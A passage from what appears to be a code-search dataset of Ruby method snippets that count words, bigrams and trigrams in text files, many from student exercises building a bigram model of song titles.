1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def print_text_statistics (text)\n\n=begin\n\t\ttext = ''\n\t\tline_count = 0\n\t\tFile.open(\"text.txt\").each do |line|\n\n\t\t\tline_count += 1\n\t\t\ttext << line\n\t\tend #Here I'm using the File class's .open(dir) to open up a file\n\t\t #that is located at an specific directory and then I'm looping\n\t\t #trough its content with a .each{} method.\n\t\t#puts \"#{line_count} lines\"\n=end\n\n\t#the File class has a method that allows you to read the lines on a text file more efficiently\n\t#it has the .readlines(dir); this method returns an array with the readed file\n\tstop_words = %w{the a by on for of are just with but and to the my I has some in}\n\tline = File.readlines(text[0]) #receives the parameter passed on the command line and holds it into the first \n\t #position of the ARGV array. This is an special array\n\tline_count = line.size\n\ttext = line.join\n\ttotal_characters = text.length\n\ttotal_characters_nospace = text.gsub(/\\s+/,'').length\n\tword_count = text.split.length\n\tparagraph_count = text.split(/\\n\\n/).length\n\tsentence_count = text.split(/\\?|\\.|!/).length\n\tall_words = text.scan(/\\w+/)\n\tgood_words = all_words.select {|word| !stop_words.include?(word)} #the .select method can be applied to arrays,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #hases and ranges and is used to return an object of those types\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #that stiesfied the conditional statement written whithin the blockb (it's a filter)\n\tgood_percentage = ((good_words.length.to_f/all_words.length.to_f)*100).to_i\n\tsentences = text.gsub(/\\s+/,' ').strip.split(/\\?|\\.|!/) #strip deletes the first and the last blank strip of spaces\n\tsentences_sorted = sentences.sort_by { |sentence| sentence.length } #sort an array, hash or range, by defining \n\t #a condition whithin the block. array.sort_by { |item| <condition> }\n\tone_third = sentences_sorted.length/3\n\tideal_sentences = sentences_sorted.slice(one_third, one_third + 1).select { |sentence| sentence =~ /is|are/}\n\n\tputs \"#{line_count} lines\"\n\tputs \"#{total_characters} characters\"\n\tputs \"#{total_characters_nospace} characters (excluding spaces)\"\n\tputs \"#{word_count} words\"\n\tputs \"#{paragraph_count} paragraphs\"\n\tputs \"#{sentence_count} sentences\"\n\tputs \"#{(sentence_count/paragraph_count).to_f} sentences per paragraph (average)\"\n\tputs \"#{(word_count/paragraph_count).to_f} words per paragraph (average)\"\n\tputs \"#{good_percentage}% of words are non fluff-words\"\n\tputs \"Summary:\\n\\n#{ideal_sentences.join('.')}\"\n\tputs \"-- End of analysis\"\n\nend",
"def mit_word_count\n read_file('LICENSE').split.map{|x| x.gsub(/[^a-z0-9]/i, '').downcase}\n .group_by{|x| x}.map{|k, v| [k, v.size]}.sort_by{|_, y| -y}\nend",
"def word_count_a_file(file_path)\n IO.read(file_path).split.length\nend",
"def run\n load_the_file\n word_frequency\n match_the_word\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def process_file(file_name)\n\tbegin\n\t\tif RUBY_PLATFORM.downcase.include? 'mswin'\n puts \"Processing File.... \"\n\t\t\tfile = File.open(file_name)\n\t\t\tunless file.eof?\n\t\t\t\tfile.each_line do |line|\n\t\t\t\t\t# do something for each line (if using windows)\n \n\t\t\t\tend\n\t\t\tend\n\t\t\tfile.close\n\t\telse\n\t\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\t\t# Clean Title\n clean_title = cleanup_title(line)\n\t\t\t\t# Split title into words\n\t\t\t\tif clean_title != nil\n\t\t\t\t\t# Array of words in the title\n\t\t\t\t\twords = clean_title.split(' ', 30)\n\t\t\t\t\twords.delete(\"\")\n\t\t\t\t\t\t# For every word in the title\n\t\t\t\t\t\tfor i in 0..words.length - 1\n\t\t\t\t\t\t# \tIf word is not already in first hash as a key\n\t\t\t\t\t\t\tif !$bigrams.key?(words[i])\n\t\t\t\t\t\t\t\t# If it is not the last word in the title\n\t\t\t\t\t\t\t\tif words[i] != words.last\n\t\t\t\t\t\t\t\t\t# Insert first word into hash as key, with a new hash containing next word as key and 1 as value\n\t\t\t\t\t\t\t\t\t$bigrams[words[i]] = {words[i+1] => 1}\n\t\t\t\t\t\t\t\t# Else it is the last word in the title\n\t\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t\t$bigrams[words[i]] = Hash.new\n\t\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# Else word is already in first hash \n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t# If word is not the last word in title\n\t\t\t\t\t\t\t\tif words[i] != words.last\n\t\t\t\t\t\t\t\t\t# If nested hash contains second word as a key\n\t\t\t\t\t\t\t\t\tif $bigrams[words[i]].key?(words[i+1])\n\t\t\t\t\t\t\t\t\t\t# Increase value that corresponds with second word\n\t\t\t\t\t\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\t\t\t\t\t\t# Else word that follows is not in second hash\n\t\t\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t\t\t# Insert second word as key in second hash and set value to 1\n\t\t\t\t\t\t\t\t\t\t$bigrams[words[i]][words[i+1]] = 1\n\t\t\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t\t# Else word is last word in title, no words follow\n\t\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue => exception\n\t\tp exception.backtrace\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def file_process(file)\n\n stop_words = File.read('stop_words.txt').split(\"\\n\")\n\n lines = File.readlines(file)\n title = lines[0]\n speech = lines[1..-1]\n line_count = speech.size\n text = speech.join\n char_count = text.length\n char_count_nospaces = text.force_encoding('UTF-8').gsub(/\\s+/, '').length\n word_count = text.scan(/\\w+/).length\n sentence_count = text.split(/\\.|\\?|!/).length\n average_words_sentence = word_count / sentence_count\n paragraph_count = text.split(/\\n\\n/).length\n word_frequency_hash = {}\n word_frequency_top = []\n\n text.split().each do |word|\n unless stop_words.include?(word.downcase)\n if word_frequency_hash.has_key?(word.downcase)\n word_frequency_hash[word.downcase] += 1\n else\n word_frequency_hash[word.downcase] = 1\n end\n end\n end\n\n non_fluff_words = (word_frequency_hash.size.to_f / word_count.to_f * 100).to_i\n\n array_of_sentences = text.scan(/[^\\.!?]+[\\.!?]/).map(&:strip).sort_by { |sentence| sentence.length }\n ideal_sentences = array_of_sentences[array_of_sentences.length/3..array_of_sentences.length - array_of_sentences.length/3]\n\n word_frequency = word_frequency_hash.sort_by { |key, value| value}.reverse\n word_frequency.flatten.each_with_index { |word, index| word_frequency_top << word if index.even? }\n\n puts \"#{title}\"\n puts \"#{line_count} lines\"\n puts \"#{char_count} characters\"\n puts \"#{char_count_nospaces} characters excluding spaces\"\n puts \"#{word_count} words\"\n puts \"#{sentence_count} sentences\"\n puts \"#{paragraph_count} paragraphs\"\n puts \"#{average_words_sentence} words per sentence (average)\"\n puts \"#{word_frequency_hash.size} non-fluff words\"\n puts \"roughly #{non_fluff_words} percent non-fluff words.\"\n puts \"Top 10 non-fluff words: #{word_frequency_top.take(10)} top 10 non-fluff words.\"\n puts \"Ideal sentences array: #{ideal_sentences.take(7) }\"\n puts\n puts\n\nend",
"def check_file\n # Read dictionary\n @word_list = File.open(@infile)\n @word_list.each do |word|\n w = Word.new(word.chop)\n # Check each token from word\n w.get_tokens.each do |seq|\n if check_sequence(seq) # Returns true if unique so far\n # Add to sequences array\n @found_sequences[seq] = word.chop\n @seq_count = @seq_count + 1\n end\n end\n end\n return @seq_count\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def word_count(all_lines_from_file)\n all_lines_from_file.split.length\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\t#begin\n\t#processes file at each line\n\tIO.foreach(file_name) do |line|\n\t\t#cleans up song title\n\t\tline = cleanup_title(line)\n\t\t#prevents a nil error with a cleaned up song\n\t\tif line != nil\n\t\t\t#removes stop words from line\n\t\t\tline = cleanupStopWords(line)\n\t\t\t#creates an array of bigrams as found on stackoverflow.com\n\t\t\tbigramArray = line.split.each_cons(2) do |e|\n\t\t\t\t#checks if the bigram exists\n\t\t\t\tif e[0] && e[1] != nil\n\t\t\t\t\t#makes a count from the existing bigram hash value\n\t\t\t\t\tcount = $bigrams[e[0]][e[1]]\n\t\t\t\t\tcount += 1\n\t\t\t\t\t#sets bigram hash value to updated count\n\t\t\t\t\t$bigrams[e[0]][e[1]] = count\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\tputs \"Finished. Bigram model built.\\n\"\nrescue\n\tSTDERR.puts \"Could not open file\"\n\texit 4\nend",
"def word_count(text)\n\tnew_text = text.split(\" \") #-->Use text.split to turn text into an array that breaks(splits) at each space.\n\t\n \tcounter = Hash.new(0) #-->Next create an empty hash for your results with count = Hash.new (0)\n\n \tnew_text.each {|word| counter[word] += 1} #-->Use a method that will take each word in the array\n\n \tputs counter #-->This will give us our results printed on the screen\nend",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def analyse(file_path)\n fixed = 0\n words = []\n File.open(file_path, \"r:iso-8859-1\") do |f|\n words = f.readlines(sep=\" \")\n words.dup.each_with_index do |word, i|\n word.delete!(\" \")\n match, dist = @tree.best word.downcase\n if !match.nil? && dist != 0\n fixed+=1\n words[i] = capitalize_if_needed(word, match)\n # puts \"#{word} - #{match}\"\n end\n end\n end\n # print \"file: #{file_path}\\nwords: #{words.size}\\nfixed words:#{((fixed.to_f/(words.size).to_f)*100).round(2)}%\\n\"\n save words, file_path\n end",
"def learn_from_line line\n tokens = tokenize(line)\n\n count_tag_unigrams @tag_unigram_counts, tokens\n count_word_tag_unigrams @word_tag_unigram_counts, tokens\n\n count_tag_bigrams @tag_bigram_counts, tokens\n count_tag_trigrams @tag_trigram_counts, tokens\n\n count_tag_bigrams @tag_skip1_bigram_counts, tokens, gap=1\n end",
"def scan\n $stderr.print \"[words] \"\n\n files.each do |file|\n if $DEBUG\n $stderr.print \"\\n[scan] #{file}\"\n else\n $stderr.print \".\"\n end\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t self[word] ||= Word.new(word)\n\t\t self[word].file!(file)\n end\n end\n end\n end\n\n $stderr.puts\n end",
"def file_stats\n\t\ttest_parser = PbfParser.new(file)\n\t\tunless test_parser.nodes.empty?\n\t\t\t@n_count+= test_parser.nodes.size\n\t\tend\n\t\tunless test_parser.ways.empty?\n\t\t\t@w_count+= test_parser.ways.size\n\t\tend\n\t\tunless test_parser.relations.empty?\n\t\t\t@r_count+= test_parser.relations.size\n\t\tend\n\t\twhile test_parser.next\n\t\t\tunless test_parser.nodes.empty?\n\t\t\t\t@n_count+= test_parser.nodes.size\n\t\t\tend\n\t\t\tunless test_parser.ways.empty?\n\t\t\t\t@w_count+= test_parser.ways.size\n\t\t\tend\n\t\t\tunless test_parser.relations.empty?\n\t\t\t\t@r_count+= test_parser.relations.size\n\t\t\tend\n\t\tend\n\t\tputs \"=============================================================\"\n\t\tputs \"Nodes: #{n_count}, Ways: #{w_count}, Relations: #{r_count}\\n\"\n\t\tputs \"=============================================================\\n\"\n\tend",
"def visit_file(name)\n\t\ttrigram = []\n\t\tFile.open(name).each { |line|\n\t\t\ttrigram.push line.chomp\n\t\t\tif trigram.length > 3\n\t\t\t\ttrigram.shift\n\t\t\tend\n\t\t\tif trigram.length == 3\n\t\t\t\tt = Array.new(trigram)\n\t\t\t\t@trigram_counts[t] = 1 + @trigram_counts[t] \n\t\t\tend\n\t\t}\n\tend",
"def train texts\n model = Hash.new(0)\n texts.each do |text|\n File.new(text).read.downcase.scan(/[a-z]+/).each do |word|\n model[word] += 1\n end\n end\n return model\nend",
"def tally!(file_count)\n table.each do |spelling, word|\n word.tally!(table.size, file_count)\n end\n end",
"def word_count(file_name, line)\n #file_array = []\n count_words_hash = {}\n line_index = 0\n\n while line_index <= line\n line_text = rio(\"hamlet.txt\").lines[line_index]\n line_array_index0 = line_text[0]\n words_array = line_array_index0.split(\" \")\n\n #puts \"Line array string: #{line_array_index0}\"\n words_array.each do |word|\n #puts \"Line text: #{line_text}, word: #{word}, index: #{line_index}\"\n if !count_words_hash.has_key?(word)\n count_words_hash[word] = 0\n end\n count_words_hash[word] += 1\n end #end array each loop\n line_index += 1\n end #end while loop\n puts \"Final hash: #{count_words_hash}\"\n\n return count_words_hash\n\nend",
"def word_count_tracker\n a_file = File.open('words.txt')\n words = Hash.new(0)\n a_file.each do |line|\n \tarray = line_to_array(line)\n \tarray.each do |word|\n \t words[word.downcase] += 1\t\n \tend\n end\n a_file.close\n puts \"please enter the desired word\"\n word = gets.chomp.downcase\n puts \"#{word} appears #{words[word]} time(s)\"\n puts \"\\n#{words}\" \nend",
"def word_count\n #need to modify regex to account for apostrophes\n text = (@text.gsub!(/\\W+|\\d/,' ').split(\" \"))\n word_count = Hash.new(0)\n text.each do |word|\n word = word.downcase\n word_count[word] +=1\n end\n word_count\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def process(output)\n read_tokens\n count_tokens\n sort_counts\n write_counts(output)\n end",
"def wc(filename)\n input = File.open(filename, 'r') {|f| f.read() }\n puts(\"%d lines\" % [input.each_line.count])\n puts(\"%d words\" % [input.split(' ').count])\n puts(\"%d chars\" % [input.split('').count])\nend",
"def count_tokens()\n @counts = Hash.new(0)\n @tokens.each do |token|\n @counts[token] += 1\n end\n @counts\n end",
"def count_words\n string = self.squish.downcase.gsub(/[^a-z0-9\\s]/i, '')\n string = string.split(\" \")\n words = Hash.new(0)\n string.each { |x|\n words[x] +=1;\n }\n return words\n end",
"def word_sizes(text)\n word_size = Hash.new(0)\n words = text.split\n words.each { |word| word_size[word.size] += 1 }\n word_size\nend",
"def each_word_count(text)\n word_counts = {}\n normalize(text).each do |word|\n word_counts[word] = 0 if !word_counts[word]\n word_counts[word] += 1\n end\n word_counts\nend",
"def count_words\n # clean up string\n str = self.downcase.gsub(/[^a-z0-9\\s]/, '') # only keep letters, numbers, and whitespace\n str = str.gsub(/\\s+/m, ' ') # remove excess whitespace\n\n # add each word to the hash\n hash = Hash.new(0)\n str.split.each do |word|\n hash[word] += 1\n end\n\n hash\n end",
"def shakespeare_counter(file,dictionary)\n nums = Array.new(dictionary.length,0)\n results = dictionary.zip(nums).to_h\n File.open(file,'r') do |f|\n f.each_line do |line|\n line.downcase.split().each do |word|\n if results.key?(word)\n results[word] +=1\n end\n end\n end\n end\n return results.reject{|k,v| v==0}\nend",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def count_sentences\n array = self.split(/[.!?]\\s/)\n array.count\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\tsong = cleanup_title(line)\n\n\t\t\tif not song.nil? and song =~ /^[\\d\\w\\s']+$/\n\t\t\t\tsong = song.downcase\n\t\t\t\tsong.gsub!(/ {2}/, \" \")\n\t\t\t\tsong = remove_stop_words(song)\n\t\t\t\twords = song.split(\" \");\n\n\t\t\t\tupdate_bigram_counts(words)\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def word_sizes(text)\n word_size = Hash.new(0)\n text.split.map do |word|\n word.delete \"^A-Za-z\"\n word_size[word.size] += 1\n end\n word_size\nend",
"def process_file(file_name)\n\n\t# local variables declaration\n\n\t# start time of this program\n t_1 = Time.now\n \n title = nil\n\n\tputs \"Processing File.... \"\n\t\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\t\n\t\t\t# call the cleanup_title method and pass the line\n\t\t\t# the cleanup_title method will return cleaned up string\n\t\t\t# the cleaned up string will be stored in the title variable\n\t\t\t# title = cleanup_title(line)\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif title != nil && title != \"\"\n\t\t\t\tbuildBigram(title)\n createWordsList(title)\n\t\t\tend\n\t\t\t\n\t\t\t\n\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\n # print total amount of titles\n puts \"\\n=======================================\"\n\t\tputs \"Total number of Titels: #{$counter_1}\\n\"\n\n\t\t# end time of this program\n\t\tt_2 = Time.now\n\n\t\t# calculate time needed for computing\n\t\tt_3 = t_2 - t_1\n\n\t\t# print computing time\n puts \"Computing Time: #{t_3}\"\n puts \"=======================================\\n\\n\"\n \n\t\t#countWords()\n\t\t#printWords()\n\t\t#printBigram()\n\t\t#printTitles()\n\n\t\tmcw(\"love\")\n\n\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def count_word_occurrences(text = '')\n count = {}\n text.encode(@encoding).downcase.split.each do |word|\n stemmed_word = (@skip_stemming) ? word : word.stem_porter\n unless stopwords.include? stemmed_word\n count[stemmed_word] = count[stemmed_word] ? count[stemmed_word] + 1 : 1\n end\n end\n count\n end",
"def word_sizes(sentence)\n words = Hash.new(0)\n sentence.split.each {|x| words[x.count(\"A-Za-z\")] += 1}\n words\nend",
"def word_count\n words = @input.downcase.scan(/\\b[\\w']+\\b/)\n\n words.each_with_object(Hash.new(0)) do |word, result|\n result[word] += 1\n end\n end",
"def word_sizes(sentence)\n sentence.split.each_with_object(Hash.new(0)) { |word, obj| obj[word.size] += 1 } \nend",
"def analysis\n @str = params[:text] ||= '解析対象の文字列'\n @words = Tag.counter(Tag.generate(@str))\n end",
"def word_stats(force_recount = false)\n process_words unless @num_words && @num_words > 0 && force_recount\n {\n :num_words => @num_words,\n :num_sentences => @num_sentences,\n :num_blanks => @num_blanks,\n :num_blanks_by_type => @num_blanks_by_type\n }\n end",
"def make_hash_with_count(passage)\n array_from_excerpt = strip_text(passage)#input from first question\n names_and_counts = Hash.new 0 #initializes at 0\n array_from_excerpt.each do |word|\n names_and_counts[word] += 1#for all subs. occurences, add 1\n end\n names_and_counts # must have the last line return the array!\nend",
"def sentence_count(all_lines_from_file)\n all_lines_from_file.split(/\\.|\\?|\\!/).length\nend",
"def score(s)\n count = 0\n s.split.each do |word|\n count += 1 if @words.include?(word)\n end\n count\n end",
"def word_counts(text)\n\tword_list = text.split(WORD_SPLIT)\n\tcounts = Hash.new(0)\n\tword_list.each { |word| counts[word] += 1 }\n\treturn counts\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def word_count(statement)\n words = {}\n wordsArr = statement.split(\" \")\n\n wordsArr.each do |word_key|\n words[word_key] ||= 0\n words[word_key] += 1\n end\n words\nend",
"def analyze_file\n File.foreach('test.txt') do |line|\n @@i = @@i + 1\n #puts line\n new_line = LineAnalyzer.new(line, @@i)\n #puts new_line.highest_wf_count\n #puts \"#{new_line.highest_wf_words} #{new_line.highest_wf_count}\"\n @analyzers << new_line\n end\n end",
"def calculate_nice_words (users)\n\thappy_word = Hash.new(0)\n\tfile_name = \"happywords.txt\"\n\tyour_happy_Words = []\n\tFile.open(file_name, \"r\").each_line do |line|\n\t\tline.strip.split(' ' || '\\t').each do |s|\n\t\t\thappy_word[s] = 1\n\t\tend \n\tend\n\thappy_count = 0\n\tusers.each do |user|\n\t\tuser[\"text\"].strip.split(' ').each do |s|\n\t\t\tif happy_word[s] == 1 then\n\t\t\t\tnewWordObj= Word.new(s, user[\"text\"])\n\t\t\t\tyour_happy_Words.push(newWordObj)\n\t\t\tend\n\t\tend\n\tend\n\tyour_happy_Words\nend",
"def number_of_stats_skillz(text)\n result = 0\n @statistics_skillz.each do |s|\n if text.downcase.include?(s)\n result += 1\n end\n end\n return result\nend",
"def get_possible_words(file_path, known_anagram)\n possible_words = {}\n possible_chars = {}\n known_anagram.each_char do |c|\n possible_chars[c] = possible_chars.key?(c) ? possible_chars[c] + 1 : 1;\n end\n\n IO.foreach(file_path).each do |word|\n word.chomp!\n chars = {}\n word.each_char do |c|\n chars[c] = chars.key?(c) ? chars[c] + 1 : 1;\n end\n\n is_possible_word = true\n chars.keys.each do |c|\n if !possible_chars.key?(c) || chars[c] > possible_chars[c]\n is_possible_word = false\n break\n end\n end\n\n possible_words[word] = 1 if is_possible_word\n end\n\n possible_words\nend",
"def stream2count(io)\n\tcount = Hash.new(0)\n\tsize = 0\n\tnextLimit = 1_000_000\n\twhile not io.eof? \n\t\tline = io.readline\n\t\tline.downcase!\n\n\t\tline.scan(/\\w+/) do |w|\n\t\t\tcount[w] += 1\n\t\tend\n\t\t\n\t\tsize += line.size\n\t\tif size > nextLimit\n\t\t\tputs \"#{size} words indexed.\"\n\t\t\tnextLimit += 1_000_000\n\t\tend\n\tend\n\t\n\tputs \"delete..\"\n\t# remove single entries\n\tcount.each do |key, val|\n\t\tcount.delete key if val<=1\n\tend\n\tputs \"del done\"\n\tcount\nend",
"def initialize(text_file_name)\n @dictionary = Hash.new 0 \n #read file text_file_name\n #extract words from string (file contents) using method 'words' below.\n #put in dictionary with their frequency (calling train! method)\n File.open(text_file_name) do |f|\n f.each_line do |line|\n words = line.split\n words.each do |word|\n \n train! words word\n\n end\n end\n end\n end",
"def count_summary(text)\n all = 0\n counts = Hash.new\n text.each_char do |ch|\n next if ch == ' '\n\n if !counts[ch] then\n counts[ch] = 1\n else\n counts[ch] += 1\n end\n\n all += 1\n end\n\n ARR.each do |ch|\n if ! counts[ch] then\n counts[ch] = 0\n end\n end\n counts\nend",
"def frequency\n counts = Hash.new(0)\n self.words.each { |word| counts[word] += 1 }\n counts\n end",
"def count_occurance(text='')\n raise \"input must be instance of String\" unless text.is_a?(String)\n\n text_chunks = text.downcase.gsub(ONE_OR_TWO_WORDS_RE, '').gsub(NON_ALPHANUMERIC_AND_NON_DOT_RE, ' ').gsub(@stopwords.to_re, '').gsub(/\\./, '').split\n text_chunks.inject(Hash.new(0)) do |container, word|\n container[word] += 1; container\n end\n end",
"def word_count\n\t\tputs \"There are #{@dictionary_analyzer.word_count(@dictionary)} words in this dictionary.\"\n\tend",
